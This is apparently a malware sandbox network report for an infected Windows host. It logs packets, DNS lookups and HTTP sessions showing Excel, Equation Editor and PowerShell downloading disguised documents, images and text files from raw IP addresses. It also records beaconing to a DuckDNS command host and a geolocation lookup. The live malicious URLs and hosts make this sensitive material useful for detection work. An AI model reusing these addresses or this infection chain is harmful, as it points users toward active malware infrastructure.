                  Jul 26, 2024 13:09:00.095204115 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095206022 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.095216990 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095228910 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095238924 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095242023 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.095251083 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095262051 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095272064 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095283985 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095293999 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095297098 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.095305920 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095315933 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095325947 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.095328093 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095339060 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095340967 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.095365047 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.129044056 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.129070997 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.129085064 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.129096985 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.129110098 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.129122019 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.129136086 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.129137993 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.129170895 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.129218102 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.177428007 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.177452087 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.177464008 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.177475929 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.177488089 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.177499056 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.177509069 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.177601099 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.177602053 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.177602053 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.177670002 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.177681923 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.177690983 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.177717924 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.384567976 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.386464119 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.386529922 CEST4917180192.168.2.22198.46.176.133
                  Jul 26, 2024 13:09:00.546581984 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:09:00.551611900 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:09:00.551763058 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:09:00.562685013 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:09:00.573777914 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:09:01.539443016 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:09:01.750840902 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:09:01.750905037 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:09:01.816678047 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:09:01.820595980 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:09:01.825496912 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:09:01.825615883 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:09:01.830477953 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:09:01.830534935 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:09:01.835524082 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:09:02.495759010 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:09:02.497265100 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:09:02.502258062 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:09:02.769778013 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:09:02.983077049 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:09:02.986278057 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:09:03.395087957 CEST4917480192.168.2.22178.237.33.50
                  Jul 26, 2024 13:09:03.400669098 CEST8049174178.237.33.50192.168.2.22
                  Jul 26, 2024 13:09:03.400762081 CEST4917480192.168.2.22178.237.33.50
                  Jul 26, 2024 13:09:03.401309013 CEST4917480192.168.2.22178.237.33.50
                  Jul 26, 2024 13:09:03.406310081 CEST8049174178.237.33.50192.168.2.22
                  Jul 26, 2024 13:09:04.026494980 CEST8049174178.237.33.50192.168.2.22
                  Jul 26, 2024 13:09:04.026572943 CEST4917480192.168.2.22178.237.33.50
                  Jul 26, 2024 13:09:04.033370018 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:09:04.038324118 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:09:05.026727915 CEST8049174178.237.33.50192.168.2.22
                  Jul 26, 2024 13:09:05.026829004 CEST4917480192.168.2.22178.237.33.50
                  Jul 26, 2024 13:09:32.877070904 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:09:32.879153013 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:09:32.884226084 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:09:45.895103931 CEST4916780192.168.2.22188.114.97.3
                  Jul 26, 2024 13:09:45.895287037 CEST4916880192.168.2.22188.114.96.3
                  Jul 26, 2024 13:10:02.969361067 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:10:02.970947027 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:10:02.977583885 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:10:08.073378086 CEST4917480192.168.2.22178.237.33.50
                  Jul 26, 2024 13:10:08.432024956 CEST4917480192.168.2.22178.237.33.50
                  Jul 26, 2024 13:10:09.040395975 CEST4917480192.168.2.22178.237.33.50
                  Jul 26, 2024 13:10:10.241583109 CEST4917480192.168.2.22178.237.33.50
                  Jul 26, 2024 13:10:12.644120932 CEST4917480192.168.2.22178.237.33.50
                  Jul 26, 2024 13:10:17.481343985 CEST4917480192.168.2.22178.237.33.50
                  Jul 26, 2024 13:10:27.136425018 CEST4917480192.168.2.22178.237.33.50
                  Jul 26, 2024 13:10:33.058919907 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:10:33.060260057 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:10:33.065125942 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:10:51.613073111 CEST4916980192.168.2.22188.114.97.3
                  Jul 26, 2024 13:11:03.137415886 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:11:03.138771057 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:11:03.143903971 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:11:33.232625961 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:11:33.235214949 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:11:33.240761042 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:12:03.328579903 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:12:03.361778975 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:12:03.366997004 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:12:33.416944981 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:12:33.418390036 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:12:33.423290968 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:13:03.489952087 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:13:03.491184950 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:13:03.496237993 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:13:33.578285933 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:13:33.579775095 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:13:33.584805965 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:14:03.662625074 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:14:03.663198948 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:14:03.668999910 CEST1464549173194.187.251.115192.168.2.22
                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                  Jul 26, 2024 13:08:44.008558989 CEST | 192.168.2.22 | 8.8.8.8 | 0xa853 | Standard query (0) | tny.wtf | A (IP address) | IN (0x0001) | false
                  Jul 26, 2024 13:08:46.128570080 CEST | 192.168.2.22 | 8.8.8.8 | 0x4233 | Standard query (0) | tny.wtf | A (IP address) | IN (0x0001) | false
                  Jul 26, 2024 13:08:47.720119953 CEST | 192.168.2.22 | 8.8.8.8 | 0x8061 | Standard query (0) | tny.wtf | A (IP address) | IN (0x0001) | false
                  Jul 26, 2024 13:08:47.732201099 CEST | 192.168.2.22 | 8.8.8.8 | 0x20ad | Standard query (0) | tny.wtf | A (IP address) | IN (0x0001) | false
                  Jul 26, 2024 13:08:51.646054983 CEST | 192.168.2.22 | 8.8.8.8 | 0x1100 | Standard query (0) | tny.wtf | A (IP address) | IN (0x0001) | false
                  Jul 26, 2024 13:08:51.661659956 CEST | 192.168.2.22 | 8.8.8.8 | 0x2664 | Standard query (0) | tny.wtf | A (IP address) | IN (0x0001) | false
                  Jul 26, 2024 13:09:00.438282013 CEST | 192.168.2.22 | 8.8.8.8 | 0xcebe | Standard query (0) | sembe.duckdns.org | A (IP address) | IN (0x0001) | false
                  Jul 26, 2024 13:09:03.381026983 CEST | 192.168.2.22 | 8.8.8.8 | 0xbb3f | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                  Jul 26, 2024 13:08:44.020967960 CEST | 8.8.8.8 | 192.168.2.22 | 0xa853 | No error (0) | tny.wtf |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                  Jul 26, 2024 13:08:44.020967960 CEST | 8.8.8.8 | 192.168.2.22 | 0xa853 | No error (0) | tny.wtf |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                  Jul 26, 2024 13:08:46.376538038 CEST | 8.8.8.8 | 192.168.2.22 | 0x4233 | No error (0) | tny.wtf |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                  Jul 26, 2024 13:08:46.376538038 CEST | 8.8.8.8 | 192.168.2.22 | 0x4233 | No error (0) | tny.wtf |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                  Jul 26, 2024 13:08:47.730391979 CEST | 8.8.8.8 | 192.168.2.22 | 0x8061 | No error (0) | tny.wtf |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                  Jul 26, 2024 13:08:47.730391979 CEST | 8.8.8.8 | 192.168.2.22 | 0x8061 | No error (0) | tny.wtf |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                  Jul 26, 2024 13:08:47.746718884 CEST | 8.8.8.8 | 192.168.2.22 | 0x20ad | No error (0) | tny.wtf |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                  Jul 26, 2024 13:08:47.746718884 CEST | 8.8.8.8 | 192.168.2.22 | 0x20ad | No error (0) | tny.wtf |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                  Jul 26, 2024 13:08:51.660269976 CEST | 8.8.8.8 | 192.168.2.22 | 0x1100 | No error (0) | tny.wtf |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                  Jul 26, 2024 13:08:51.660269976 CEST | 8.8.8.8 | 192.168.2.22 | 0x1100 | No error (0) | tny.wtf |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                  Jul 26, 2024 13:08:51.726756096 CEST | 8.8.8.8 | 192.168.2.22 | 0x2664 | No error (0) | tny.wtf |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                  Jul 26, 2024 13:08:51.726756096 CEST | 8.8.8.8 | 192.168.2.22 | 0x2664 | No error (0) | tny.wtf |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                  Jul 26, 2024 13:09:00.541742086 CEST | 8.8.8.8 | 192.168.2.22 | 0xcebe | No error (0) | sembe.duckdns.org |  | 194.187.251.115 | A (IP address) | IN (0x0001) | false
                  Jul 26, 2024 13:09:03.391727924 CEST | 8.8.8.8 | 192.168.2.22 | 0xbb3f | No error (0) | geoplugin.net |  | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                  • tny.wtf
                  • 192.3.176.174
                  • 198.46.176.133
                  • geoplugin.net
                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  0 | 192.168.2.22 | 49165 | 188.114.96.3 | 80 | 724 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 26, 2024 13:08:44.031326056 CEST | 316 | OUT | GET /sA HTTP/1.1
                  Accept: */*
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: tny.wtf
                  Connection: Keep-Alive
                  Jul 26, 2024 13:08:45.200596094 CEST | 750 | IN | HTTP/1.1 302 Found
                  Date: Fri, 26 Jul 2024 11:08:45 GMT
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Location: http://192.3.176.174/60/gbh/creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback.doc
                  X-Powered-By: ASP.NET
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zZJ4aimGfbtijcnS3y2hoYF3OwEeFjuacCtHGKGmFpETlw43OI6Z%2FDLCLrx5uZyRSQT%2FHTXNLDV%2BWUJbDmS1Ugv6joh%2FwAaXbldV9r%2BghJGmggrRjTinxkw9"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a93eef9c9618c41-EWR
                  alt-svc: h3=":443"; ma=86400
                  Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  1 | 192.168.2.22 | 49166 | 192.3.176.174 | 80 | 724 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 26, 2024 13:08:45.211235046 CEST | 477 | OUT | GET /60/gbh/creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback.doc HTTP/1.1
                  Accept: */*
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: 192.3.176.174
                  Connection: Keep-Alive
                  Jul 26, 2024 13:08:45.694180012 CEST | 1236 | IN | HTTP/1.1 200 OK
                  Date: Fri, 26 Jul 2024 11:08:45 GMT
                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                  Last-Modified: Fri, 26 Jul 2024 06:00:53 GMT
                  ETag: "14fdf-61e203bf34de1"
                  Accept-Ranges: bytes
                  Content-Length: 85983
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: application/msword


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  2 | 192.168.2.22 | 49167 | 188.114.97.3 | 80 | 2504 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 26, 2024 13:08:46.836004972 CEST | 129 | OUT | OPTIONS / HTTP/1.1
                  User-Agent: Microsoft Office Protocol Discovery
                  Host: tny.wtf
                  Content-Length: 0
                  Connection: Keep-Alive
                  Jul 26, 2024 13:08:47.108252048 CEST | 558 | IN | HTTP/1.1 404 Not Found
                  Date: Fri, 26 Jul 2024 11:08:47 GMT
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  X-Powered-By: ASP.NET
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jJElqVnUA8jKAx%2F3PmV0wFJdjDNyvn8deX5%2B0FMsEEFY2LgzOlpDDiWBEmqVoyPaex68lylLAgyk9nol7pY2Y03zAZpaFKvvz4cN800pE244OSTpBPUufyBF"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a93ef0988077288-EWR
                  alt-svc: h3=":443"; ma=86400
                  Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0
                  Jul 26, 2024 13:08:47.367516041 CEST | 129 | OUT | OPTIONS / HTTP/1.1
                  User-Agent: Microsoft Office Protocol Discovery
                  Host: tny.wtf
                  Content-Length: 0
                  Connection: Keep-Alive
                  Jul 26, 2024 13:08:47.515921116 CEST | 562 | IN | HTTP/1.1 404 Not Found
                  Date: Fri, 26 Jul 2024 11:08:47 GMT
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  X-Powered-By: ASP.NET
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J3zRELeiEaDmw4y51hpaSqR5HJUC7tJYsS6NiS8pIdb8C4VnJ%2BAFmlxrWEe4Ehzvc1hOVzJpro8aThAGNaDy1v1Jf1MuEDT6My%2FkHgsficCy1%2BHgs915%2Bj46"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a93ef0c5a7e7288-EWR
                  alt-svc: h3=":443"; ma=86400
                  Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0
                  Jul 26, 2024 13:08:47.524637938 CEST | 129 | OUT | OPTIONS / HTTP/1.1
                  User-Agent: Microsoft Office Protocol Discovery
                  Host: tny.wtf
                  Content-Length: 0
                  Connection: Keep-Alive
                  Jul 26, 2024 13:08:47.677181959 CEST | 560 | IN | HTTP/1.1 404 Not Found
                  Date: Fri, 26 Jul 2024 11:08:47 GMT
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  X-Powered-By: ASP.NET
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h6f%2BYPJbcgtCcj7FAeR%2B3SmYzifSQgkg5DDsALOW850tHuATRAJEs04PCjkDMyoSDzzcFcXtlXs3y0gZ83gqmPazoOWQlVTepC7Hq1luWpTVG%2F6VaEILJLz5"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a93ef0d5b577288-EWR
                  alt-svc: h3=":443"; ma=86400
                  Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0
                  Jul 26, 2024 13:08:52.411298037 CEST | 129 | OUT | HEAD /sA HTTP/1.1
                  User-Agent: Microsoft Office Existence Discovery
                  Host: tny.wtf
                  Content-Length: 0
                  Connection: Keep-Alive
                  Jul 26, 2024 13:08:52.580640078 CEST | 548 | IN | HTTP/1.1 405 Method Not Allowed
                  Date: Fri, 26 Jul 2024 11:08:52 GMT
                  Connection: keep-alive
                  Allow: GET
                  X-Powered-By: ASP.NET
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=69z6GR35FERSrAftuEP4Jq3vDRrFRNMcwRs3qWPs5iBKtKhZOG%2BqqkIDV70o8Q3LfVu9eDJsgFq0%2Bf0uHoUXRzUqok3wMtf4emB1tqyis6kj4dz%2F93inL4QX"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a93ef2beb7c7288-EWR
                  alt-svc: h3=":443"; ma=86400


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  3 | 192.168.2.22 | 49168 | 188.114.96.3 | 80 | 2504 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 26, 2024 13:08:47.752281904 CEST | 110 | OUT | HEAD /sA HTTP/1.1
                  Connection: Keep-Alive
                  User-Agent: Microsoft Office Existence Discovery
                  Host: tny.wtf
                  Jul 26, 2024 13:08:48.301784039 CEST | 544 | IN | HTTP/1.1 405 Method Not Allowed
                  Date: Fri, 26 Jul 2024 11:08:48 GMT
                  Connection: keep-alive
                  Allow: GET
                  X-Powered-By: ASP.NET
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HT8EM5KiQy3%2Fa69BXqQrXmwae9jBZDQSWfCVNh9Lwqc02hqOKtuS6RJyRlGl5snmax2mwcG7Vf3C1tJpuj8eBSXGC9X9Hv7sI22gM4tSdazJ0xgNVygo1t6k"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a93ef1109ce8cbf-EWR
                  alt-svc: h3=":443"; ma=86400
                  Jul 26, 2024 13:08:48.514794111 CEST | 544 | IN | HTTP/1.1 405 Method Not Allowed
                  Date: Fri, 26 Jul 2024 11:08:48 GMT
                  Connection: keep-alive
                  Allow: GET
                  X-Powered-By: ASP.NET
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HT8EM5KiQy3%2Fa69BXqQrXmwae9jBZDQSWfCVNh9Lwqc02hqOKtuS6RJyRlGl5snmax2mwcG7Vf3C1tJpuj8eBSXGC9X9Hv7sI22gM4tSdazJ0xgNVygo1t6k"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a93ef1109ce8cbf-EWR
                  alt-svc: h3=":443"; ma=86400


                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                  4 | 192.168.2.22 | 49169 | 188.114.97.3 | 80
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 26, 2024 13:08:51.734004974 CEST | 124 | OUT | OPTIONS / HTTP/1.1
                  Connection: Keep-Alive
                  User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                  translate: f
                  Host: tny.wtf
                  Jul 26, 2024 13:08:52.280599117 CEST | 566 | IN | HTTP/1.1 404 Not Found
                  Date: Fri, 26 Jul 2024 11:08:52 GMT
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  X-Powered-By: ASP.NET
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=prf2EfDG%2FCvxWIKSDeHLWKkfPTRVsDRCuAyW86jiVQSWKfa%2B1kiG8tSJiY%2FSvWP3xgtqHIfqHeO7mMkS287lmAmNei3rpT18q%2FqWq1khLz%2BA%2BqJLrw1dVGQ1"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a93ef29effcc354-EWR
                  alt-svc: h3=":443"; ma=86400
                  Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0
                  Jul 26, 2024 13:08:52.496649981 CEST | 566 | IN | HTTP/1.1 404 Not Found
                  Date: Fri, 26 Jul 2024 11:08:52 GMT
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  X-Powered-By: ASP.NET
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=prf2EfDG%2FCvxWIKSDeHLWKkfPTRVsDRCuAyW86jiVQSWKfa%2B1kiG8tSJiY%2FSvWP3xgtqHIfqHeO7mMkS287lmAmNei3rpT18q%2FqWq1khLz%2BA%2BqJLrw1dVGQ1"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a93ef29effcc354-EWR
                  alt-svc: h3=":443"; ma=86400
                  Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  5 | 192.168.2.22 | 49170 | 192.3.176.174 | 80 | 3120 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 26, 2024 13:08:53.072285891 CEST | 333 | OUT | GET /60/creatednewwaterbottleforme.gIF HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: 192.3.176.174
                  Connection: Keep-Alive
                  Jul 26, 2024 13:08:53.571343899 CEST | 1236 | IN | HTTP/1.1 200 OK
                  Date: Fri, 26 Jul 2024 11:08:53 GMT
                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                  Last-Modified: Fri, 26 Jul 2024 05:56:01 GMT
                  ETag: "667e4-61e202a894788"
                  Accept-Ranges: bytes
                  Content-Length: 419812
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: image/gif


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  6 | 192.168.2.22 | 49171 | 198.46.176.133 | 80 | 3240 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 26, 2024 13:08:56.389775038 CEST | 79 | OUT | GET /Upload/vbs.jpeg HTTP/1.1
                  Host: 198.46.176.133
                  Connection: Keep-Alive
                  Jul 26, 2024 13:08:56.914166927 CEST | 1236 | IN | HTTP/1.1 200 OK
                  Date: Fri, 26 Jul 2024 11:08:56 GMT
                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                  Last-Modified: Wed, 10 Jul 2024 11:19:54 GMT
                  ETag: "1d7285-61ce2d35c4b0c"
                  Accept-Ranges: bytes
                  Content-Length: 1929861
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: image/jpeg


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  7 | 192.168.2.22 | 49172 | 192.3.176.174 | 80 | 3240 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 26, 2024 13:08:58.938898087 CEST | 74 | OUT | GET /60/WDER.txt HTTP/1.1
                  Host: 192.3.176.174
                  Connection: Keep-Alive
                  Jul 26, 2024 13:08:59.452513933 CEST | 1236 | IN | HTTP/1.1 200 OK
                  Date: Fri, 26 Jul 2024 11:08:59 GMT
                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                  Last-Modified: Fri, 26 Jul 2024 02:37:01 GMT
